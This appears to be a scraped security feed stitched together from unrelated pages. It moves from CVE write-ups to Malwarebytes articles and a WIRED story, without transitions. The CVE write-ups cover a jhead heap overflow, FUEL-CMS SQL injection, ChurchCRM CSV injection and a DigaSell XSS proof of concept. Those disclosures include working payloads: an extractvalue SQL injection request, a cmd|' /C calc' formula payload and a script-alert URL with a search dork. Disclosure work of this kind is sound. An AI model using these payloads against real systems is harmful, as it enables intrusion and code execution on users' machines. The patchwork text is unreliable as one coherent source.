Buffer Overflow vulnerability in jpgfile.c in Matthias-Wandel jhead version 3.04, allows local attackers to execute arbitrary code and cause a denial of service (DoS).

**Impact**

fuzzer&poc1.zip

    fstark@fstark-virtual-machine:~/jhead-master$ ./jhead afl_collect_output_dir/fuzz1\:id\:000013\,sig\:06\,src\:000263\,time\:295896\,op\:arith8\,pos\:8\,val\:+15 
    =================================================================
    ==4212==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eff4 at pc 0x0000004bd123 bp 0x7ffd6e2fdb80 sp 0x7ffd6e2fdb70
    READ of size 1 at 0x60200000eff4 thread T0
        #0 0x4bd122 in process_COM /home/fstark/jhead-master/jpgfile.c:51
        #1 0x4be667 in ReadJpegSections /home/fstark/jhead-master/jpgfile.c:240
        #2 0x4bfbad in ReadJpegSections /home/fstark/jhead-master/jpgfile.c:125
        #3 0x4bfbad in ReadJpegFile /home/fstark/jhead-master/jpgfile.c:378
        #4 0x4b71bb in ProcessFile /home/fstark/jhead-master/jhead.c:905
        #5 0x4066dc in main /home/fstark/jhead-master/jhead.c:1756
        #6 0x7f3dc850083f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
        #7 0x40a1e8 in _start (/home/fstark/jhead-master/jhead+0x40a1e8)
    
    0x60200000eff4 is located 0 bytes to the right of 4-byte region [0x60200000eff0,0x60200000eff4)
    allocated by thread T0 here:
        #0 0x485392 in malloc (/home/fstark/jhead-master/jhead+0x485392)
        #1 0x4bd558 in ReadJpegSections /home/fstark/jhead-master/jpgfile.c:172
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fstark/jhead-master/jpgfile.c:51 process_COM
    Shadow bytes around the buggy address:
      0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[04]fa
      0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==4212==ABORTING
    

**Patches**

Fixed by 4827ed3  
Matthias-Wandel@4827ed3

**References**

Matthias-Wandel#8  
Matthias-Wandel@4827ed3

CVE-2020-28840: heap-buffer-overflow on process_COM in jpgfile.c:51

SQL Injection vulnerability in file Base_module_model.php in Daylight Studio FUEL-CMS version 1.4.9, allows remote attackers to execute arbitrary code via the col parameter to function list_items.

Parameter Name:col  
Parameter Type: GET  
Attack Pattern: extractvalue(1,concat(char(126),(select/\*\*/current\_user())))

    GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=extractvalue(1,concat(char(126),(select/**/current_user())))&fuel_inline=0 HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://127.0.0.1/fuel/pages
    Cookie: ci_session=cfe42220d7540c849f2fdd72ddb732ff0e6addfb; fuel_74d00769f76d3dfc59096d1a4f6419d3=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_74d00769f76d3dfc59096d1a4f6419d3=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%257D

CVE-2020-24950: Vulnerability -  SQL Injection · Issue #562 · daylightstudio/FUEL-CMS

CSV Injection vulnerability in ChurchCRM version 4.2.0, allows remote attackers to execute arbitrary code via crafted CSV file.

**Vulnerability Name:** CSV Injection/ Formula Injection  
**Severity:** High  
**Description:** CSV Injection (aka Excel Macro Injection or Formula Injection) exists in List Event Types feature in ChurchCRM v4.2.0 via Name field that is mistreated while exporting to a CSV file.  
**Impact:** Arbitrary formulas can be injected into CSV files which can lead to remote code execution at the client or data leakage via maliciously injected hyper-links.  
**Version Affected:** 4.2.0  
**Payload Used:** =10+20+cmd|' /C calc'!A0  
**Vulnerable URL:** master/EventNames.php  
**Vulnerable Parameters:** Name  
**Steps to Reproduce:**

1.  Login to the application, goto 'Events' module and then "List Event Types"
2.  Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the 'Name' field
3.  Now goto 'List Event types' module and click CSV to download the CSV file
4.  Open the CSV file, allow all popups and our payload is executed (calculator is opened).  
      
    

**Note:** Incase the payload does not execute, then enable 'External Content' and 'Macro' settings in Excel. Goto Excel > File > Options > Trust Center > Trust Center Settings > Macro/External Content.  
**References:**  
https://nvd.nist.gov/vuln/detail/CVE-2019-12134  
http://cwe.mitre.org/data/definitions/1236.html

Just to confirm, this is not an issue with our CSV import but if a row had bad data the exported CVS has an issue. We use https://datatables.net/ if you have a chance, maybe you can help see if they have fixed that.

@DawoudIO I think the problem lies in the export feature. It would be nice to have an option in download csv to escape strings that begin with "+","-","@", or "=" by prepending "\\t".  
For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.

I'm not seeing how this is a particularly useful bug report. Anyone can create a CSV file with any arbitrary text in it using **any text editor** or text generation tool. How using ChurchCRM to generate a CSV with questionable content is a "bug" leaves me perplexed. For example, this logic implies the bash echo command has this same _"bug"_ too:

echo -e "Header 1, Header 2, Header 3\\n1,=10+20+cmd|' /C calc'!A0,Foo bar\\n2,Hello world,Text text" \> test.csv

If there was a method to use unauthenticated access to ChurchCRM that allowed insertion of arbitrary data values AND generate a CSV AND somehow send that somewhere then _maybe_ I'd consider this a flaw in ChurchCRM. Maybe I'm missing something?

I understand that this vulnerability would be much impactful if any unauthenticated user would be able to inject the payload resulting into code execution on the internal user's system. However this could also be impactful, if any internal user of the application enters the payload which results into impacting all the other user of the application. Here the payload is entered on ChurchCRM application leaving the application at fault to generate a file which can execute malicious commands on the user's system. A user may embed Dynamic Data Exchange (DDE) formulas to perform code execution, download a backdoor, open a malicious website etc.  
The legitimate user may download the file because of following reasons:

1.  The user trusts the site that the content is coming from.
2.  The user assumes that it is only a csv file and that it won't contain functions or macro's and won't care about any warnings from Excel about potential malicious functionality in the file.

https://owasp.org/www-community/attacks/CSV\_Injection#:~:text=CSV%20Injection%2C%20also%20known%20as,the%20software%20as%20a%20formula.  
https://payatu.com/csv-injection-basic-to-exploit

Feel free to create a PR.

CVE-2020-28848: CSV Injection Vulnerability · Issue #5465 · ChurchCRM/CRM

eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.9.1 and 2.6.5, improper validation of sequence numbers may lead to remotely reachable assertion failure. This can remotely crash any Fast-DDS process. Versions 2.9.1 and 2.6.5 contain a patch for this issue.

**Comments**

squizz617 added a commit to squizz617/Fast-DDS that referenced this issue

Feb 7, 2023

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue eProsima#3236.

squizz617 added a commit to squizz617/Fast-DDS that referenced this issue

Feb 7, 2023

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue eProsima#3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

squizz617 added a commit to squizz617/Fast-DDS that referenced this issue

Mar 15, 2023

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

MiguelCompany pushed a commit that referenced this issue

Mar 16, 2023

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

mergify bot pushed a commit that referenced this issue

Mar 16, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

mergify bot pushed a commit that referenced this issue

Mar 16, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

mergify bot pushed a commit that referenced this issue

Mar 16, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

MiguelCompany pushed a commit that referenced this issue

Mar 22, 2023

 

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

Co-authored-by: Seulbae Kim <squizz617@gmail.com>

MiguelCompany pushed a commit that referenced this issue

Mar 24, 2023

\* Implement a validity check for firstSN (#3274)

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

\* Refs #17717: Logging Macro fix

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>

---------

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>
Co-authored-by: Seulbae Kim <squizz617@gmail.com>
Co-authored-by: Mario Dominguez <mariodominguez@eprosima.com>

JLBuenoLopez-eProsima pushed a commit that referenced this issue

Apr 11, 2023

\* Implement a validity check for firstSN (#3274)

\* Implement a validity check for firstSN

Following 8.3.8.6.3 of DDS-RTPS 2.5.
This fixes issue #3236.

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* fix typo

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

\* add test input for issue #3236 (pr #3274)

Signed-off-by: Seulbae Kim <squizz617@gmail.com>

---------

Signed-off-by: Seulbae Kim <squizz617@gmail.com>
(cherry picked from commit 3aa3ee0)

\* Refs #17717: Logging Macro fix

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>

---------

Signed-off-by: Mario Dominguez <mariodominguez@eprosima.com>
Co-authored-by: Seulbae Kim <squizz617@gmail.com>
Co-authored-by: Mario Dominguez <mariodominguez@eprosima.com>

CVE-2023-39949: Assertion failure in SequenceNumber.h via malformed SPDP packet only when compiled in logging-enabled (Debug) mode · Issue #3236 · eProsima/Fast-DDS

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

Categories: News
Categories: Privacy
Analysis of the Zoom Terms of Service caused users to believe their video conferences were being used to train an AI



(Read more...)




The post Zoom clarifies user consent requirement when training its AI appeared first on Malwarebytes Labs.

Changes in the terms of service (TOS) of the Zoom video-conferencing software have caused some turmoil. Since the pandemic, Zoom (Video Conferencing) has become a household name. Zoom came up as the big winner in the video conferencing struggle that enabled us to work from home. Now that things are more or less returning to a new normal, this has also had an impact on their success. But the recent uproar about their TOS could turn out to be a bigger blow.

The strange thing should be that the offending bits of the changes were effectuated in March of 2023. But nobody noticed until August when people started posting and discussing a portion of Zoom’s TOS. They found that Zoom claimed the right to access, use, collect, create, modify, distribute, process, share, maintain, and store Service Generated Data, including for the purpose of product and service development, marketing, analytics, quality assurance, machine learning or artificial intelligence (AI).

For a better understanding, you will want to know that in May, Zoom announced a collaboration with Anthropic, an artificial intelligence company that conducts research into AI safety and develops tools based on that work. The AI called Claude is intended to be integrated into the Zoom platform.

After all the uproar about it, Zoom changed its Terms of Service to reflect that Zoom will require user consent to use content for training artificial intelligence.

> "Notwithstanding the above, Zoom will not use audio, video, or chat Customer Content to train our artificial intelligence models without your consent."

In a blogpost, Zoom explains that they updated the TOS (in section 10.4) to confirm that they will not use audio, video, or chat customer content to train the AI models without your consent. And that the section about training artificial intelligence only concerned certain information about how customers in the aggregate use their product. They claimed to only do this to improve the product—not to spy on users.

The explanation makes a lot of sense, but wouldn’t it have been easier if they’d said that in the first place? From the way the TOS was worded, I would have guessed that that’s what they wanted us to think and not what they actually meant.

Unfortunately, they are not alone. Many software companies have their legal documents and agreements drawn up by professionals, that do not care whether their products can be read by ordinary people. As long as the legal content is correct and covers all angles, it’s all good in their point of view.

For that reason, it happens a lot that TOS, EULA’s (End User License Agreements), Privacy Policies, and privacy agreements do not get read in full. And even if we do, some of them look like they are designed not to be understood even if we take the trouble of reading through all of it.

If you don’t believe me, have a look at the Zoom TOS. If you have no trouble understanding what it says there, you are probably a lawyer specialized in corporate law. Even now that we have summarized it for you, it still looks like a major case of letter soup designed to make your eyes roll.

What most of these pieces of text have in common is:

*   You are supposed to have read them once you use the software, be it by putting a checkmark at the bottom of an endless text, or by simply proceeding to use the software
*   They protect the rights of the issuer
*   They restrict your usage
*   They explain what the issuer can do with your information and content
*   They are written by and for lawyers
*   They often favor length and complexity

But most of the time we view them as something that stands in the way of our goal, which is to play the game, use the software, or start working. This has been a known problem for many years, even so much so that a friendly programmer set out to work on a solution. If you’re interested in what a EULA has to say, but no time or inclination to read through all of it to find the important parts, give Eulalyzer a try. It’s free for personal use.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Zoom clarifies user consent requirement when training its AI

Categories: Threat Intelligence
July saw one of the highest number of ransomware attacks in 2023 at 441. At the forefront of these attacks is, once again, Cl0p.



(Read more...)




The post Ransomware review: August 2023 appeared first on Malwarebytes Labs.

_This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are those where the victim **did not** pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

July saw one of the highest number of ransomware attacks in 2023 at 441, second only to a record-breaking 556 attacks in May. At the forefront of these attacks is, once again, Cl0p.

In June, Cl0p shot to the top of the charts due to their use of a zero-day exploit in MOVEit Transfer, and the story in July is no different. Using the same vulnerability, the gang attacked an additional 170 victims in July—the second highest number of attacks by a single gang all year, just two shy of MalasLockers' record in May.

Amidst all the Cl0p chaos, however, a familiar foe seems to be quietly waning: LockBit.

Known ransomware attacks by gang, July 2023

The LockBit gang is experiencing a steady four-month decline in the number of attacks it has carried out. Since April 2023, we’ve observed an average decrease of 20 attacks a month from the group. LockBit’s 107 attacks in April to 41 in July represents a 62 percent dip in activity.

We’ve seen a similar pattern from LockBit before, and it’s not unusual for ransomware gang activity to ebb and flow. Still, it’s worth mentioning that a suspected LockBit affiliate was arrested last month. At least LockBit’s July numbers, then, could be explained by them simply wanting to lay low for a bit.

When another LockBit suspected affiliate was arrested in November 2022, we also saw a similar historic low in activity from the group.

**"Big game hunting" numbers**

Research published in July by Chainanalysis showed that ransomware gangs raked in around $449 million from victims in the last six months. The driving force behind this huge number? Chainanalysis says it is “big game hunting.” the practice of targeting large, financially well-off corporations in order to secure the biggest possible payouts.

Chainanalysis also mentions an increase in payouts less than $1000, meaning smaller companies are still being targeted by ransomware gangs as well.

At around this same time last year, total payouts were slightly under $300 million—a difference of over $150 million.

One possible reason for this increase, says Chainanalysis, could be that because fewer and fewer firms are willing to pay the ransom, ransomware gangs are increasing the size of their ransom demands, the idea being to squeeze the most money possible out of the firms still willing to pay.

Malwarebytes' own data suggests that the increase in payouts could also be a simple consequence of there being more ransomware attacks in general. From March 2022 to July 2022, Malwarebytes recorded a total of 1,140 ransomware attacks. From March 2023 to July 2023, we recorded a total of 2,130.

Likely, there’s a combination of factors at play here. Our logic goes as follows:

> Bigger targets + greedier gangs + more ransomware attacks in general = Historically high payouts.

Known ransomware attacks by country, July 2023

Attacks on the US and UK are at a four-month high. Four-mouth trends on attacks in Italy, on the other hand, suggest that the country is a new regular in the monthly "Top Five" of most-attacked countries.

Known ransomware attacks by industry sector, July 2023

In an article published in October of last year, we speculated on the future evolution of ransomware and how, with the rise of double-extortion schemes, more and more gangs might pivot away from using encryptors entirely. Interestingly, new research last month by Huntress seems to support this idea—exemplified by the most active ransomware gang today no less.

In their massive zero-day exploitation sprees, **Cl0p has apparently not deployed ransomware at all**. Instead, the group has focused on simply stealing company data to then later use as leverage against victims.

This move represents a significant departure from the majority of top ransomware gangs, and it forces organizations to rethink the nature of the problem: i’s not about ransomware per se, it’s about an intruder in your network. The really dangerous thing is turning out to be the access, not the ransomware software itself. 

Cl0p's focus on exploiting zero-days for initial access is revolutionary on its own. Pairing this with a pure data-exfiltration approach could signal an even bigger paradigm shift in how ransomware gangs operate into the future.

Speaking of innovations from top gangs, last month ALPHV was observed offering an API for their data leak site. 

The new API is a conduit for swift data dissemination, helping other cybercriminals instantly access and distribute the stolen information on the dark web. The overarching goal here —especially considering that ALPHV failed to seek a ransom from recently-breached cosmetics company Estee Lauder—seems to be to pressure victims to pay as stolen data reaches wider audiences.

Time will tell if the move pays off, but if nothing else, it signals cybercriminal desperation amid declining ransomware payments.

**New players****CATCUS **

CACTUS emerged in March 2023 as a fresh strain of ransomware, zeroing in on large-scale commercial operations. Last month, they published 18 victims on their leak site.

To infiltrate systems, this gang exploits well-known vulnerabilities present in VPNs. Once CACTUS operatives gain access to a network, they enumerate local and network user accounts and reachable endpoints. Following this, they craft new user accounts and deploy their ransomware encryptor. The uniqueness of CACTUS lies in their use of specialized scripts that automate the release and activation of the ransomware through scheduled tasks.

The CACTUS leak site

**Cyclops/Knight **

Though the underworld caught wind of Cyclops in May 2023, it's only recently that evidence of their activities surfaced as new victims' details appeared on their dark web portal. In addition, they've announced a shift in branding to "Knight." Last month, they published 6 victims on their leak site.

This ransomware is versatile, capable of compromising Windows, Linux, and macOS systems alike. Cyclops stands out with its intricate encryption methodology, which mandates a unique key to decrypt the execution binary. Cyclops also comes equipped with a distinct stealer component designed to extract and transfer sensitive information.

The Cyclops/Knight leak site

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware review: August 2023

HAProxy through 2.0.32, 2.1.x and 2.2.x through 2.2.30, 2.3.x and 2.4.x through 2.4.23, 2.5.x and 2.6.x before 2.6.15, 2.7.x before 2.7.10, and 2.8.x before 2.8.2 forwards empty Content-Length headers, violating RFC 9110 section 8.6. In uncommon cases, an HTTP/1 server behind HAProxy may interpret the payload as an extra request.

CVE-2023-40225

In 2008, Boston’s transit authority sued to stop MIT hackers from presenting at the Defcon hacker conference on how to get free subway rides. Today, four teens picked up where they left off.

In early August of 2008, almost exactly 15 years ago, the Defcon hacker conference in Las Vegas was hit with one of the worst scandals in its history. Just before a group of MIT students planned to give a talk at the conference about a method they’d found to get free rides on Boston’s subway system—known as the Massachusetts Bay Transit Authority—the MBTA sued them and obtained a restraining order to prevent them from speaking. The talk was canceled, but not before the hackers’ slides were widely distributed to conference attendees and published online.

In the summer of 2021, 15-year-olds Matty Harris and Zachary Bertocchi were riding the Boston subway when Harris told Bertocchi about a Wikipedia article he’d read that mentioned this moment in hacker history. The two teenagers, both students at Medford Vocational Technical High School in Boston, began musing about whether they could replicate the MIT hackers’ work, and maybe even get free subway rides.

They figured it had to be impossible. “We assumed that because that was more than a decade earlier, and it had got heavy publicity, that they would have fixed it,” Harris says.

Bertocchi skips to the end of the story: “They didn’t.”

The Boston subway hackers (from left to right) Scott Campbell, 16; Noah Gibson, 17; Matty Harris, 17; and Zack Bertocchi, 17.Photograph: Roger Kisby

Now, after two years of work, that pair of teens and two fellow hacker friends, Noah Gibson and Scott Campbell, have presented the results of their research at the Defcon hacker conference in Las Vegas. In fact, they not only replicated the MIT hackers’ 2008 tricks, but took them a step further. The 2008 team had hacked Boston’s Charle Ticket magstripe paper cards to copy them, change their value, and get free rides—but those cards went out of commission in 2021. So the four teens extended other research done by the 2008 hacker team to fully reverse engineer the CharlieCard, the RFID touchless smart cards the MBTA uses today. The hackers can now add any amount of money to one of these cards or invisibly designate it a discounted student card, a senior card, or even an MBTA employee card that gives unlimited free rides. “You name it, we can make it,” says Campbell.

To demonstrate their work, the teens have gone so far as create their own portable “vending machine”—a small desktop device with a touchscreen and an RFID card sensor—that can add any value they choose to a CharlieCard or change its settings, and they’ve built the same functionality into an Android app that can add credit with a tap. They demonstrate both tricks in the video below:

In contrast to the Defcon subway-hacking blowup of 2008—and in a sign of how far companies and government agencies have come in their relationship with the cybersecurity community—the four hackers say the MBTA didn’t threaten to sue them or try to block their Defcon talk. Instead, it invited them to the transit authority headquarters last year to deliver a presentation on the vulnerabilities they’d found. Then the MBTA politely asked that they obscure part of their technique to make it harder for other hackers to replicate.

The hackers say the MBTA hasn’t actually fixed the vulnerabilities they discovered and instead appears to be waiting for an entirely new subway card system that it plans to roll out in 2025. When WIRED reached out to the MBTA, its director of communications, Joe Pesaturo, responded in a statement that “the MBTA was pleased that the students reached out and worked collaboratively with the fare collection team.”

“It should be noted that the vulnerability identified by the students does NOT pose an imminent risk affecting safety, system disruption, or a data breach,” Pesaturo added. “The MBTA's fraud detection team has increased monitoring to account for this vulnerability \[and\] does not anticipate any significant financial impact to the MBTA. This vulnerability will not exist once the new fare collection system goes live, due to the fact that it will be an account-based system versus today’s card-based system.”

The high schoolers say that when they started their research in 2021, they were merely trying to replicate the 2008 team’s CharlieTicket hacking research. But when the MBTA phased out those magstripe cards just months later, they wanted to understand the inner workings of the CharlieCards. After months of trial and error with different RFID readers, they were eventually able to dump the contents of data on the cards and begin deciphering them.

Unlike credit or debit cards, whose balances are tracked in external databases rather than on the cards themselves, CharlieCards actually store about a kilobyte of data in their own memory, including their monetary value. To prevent that value from being changed, each line of data in the cards’ memory includes a “checksum,” a string of characters computed from the value using the MBTA’s undisclosed algorithm.

The hackers figured out how to reproduce a “checksum” calculation intended to prevent the value stored on CharlieCards from being changed, circumventing that anti-hacking protection.Photograph: Roger Kisby

By comparing identical lines of memory on different cards and looking at their checksum values, the hackers began to figure out how the checksum function worked. They were eventually able to compute checksums that allowed them to change the monetary value on a card, along with the checksum that would cause a CharlieCard reader to accept it as valid. They computed a long list of checksums for every value so that they could arbitrarily change the balance of the card to whatever amount they chose. At the MBTA’s request, they’re not releasing that table, nor the details of their checksum reverse engineering work.

Not long after they made this breakthrough, in December of last year, the teens read in the _Boston Globe_ about another hacker, an MIT grad and penetration tester named Bobby Rauch, who had figured out how to clone CharlieCards using an Android Phone or a Flipper Zero handheld radio-hacking device. With that technique, Rauch said he could simply copy a CharlieCard before spending its value, effectively obtaining unlimited free rides. When he demonstrated the technique to the MBTA, however, it claimed it could spot the cloned cards when they were used and deactivate them.

Early this year, the four teenagers showed Rauch their techniques, which went beyond cloning to include more granular changes to a card’s data. The older hacker was impressed and offered to help them report their findings to the MBTA—without getting sued.

In working with Rauch, the MBTA had created a vulnerability disclosure program to cooperate with friendly hackers who agreed to share cybersecurity vulnerabilities they found. The teens say they were invited to a meeting at the MBTA that included no fewer than 12 of the agency’s executives, all of whom seemed grateful for their willingness to share their findings. The MBTA officials asked the high schoolers to not reveal their findings for 90 days and to hold details of their checksum hacking techniques in confidence, but otherwise agreed that they wouldn’t interfere with any presentation of their results. The four teens say they found the MBTA’s chief information security officer, Scott Margolis, especially easy to work with. “Fantastic guy,” say Bertocchi.

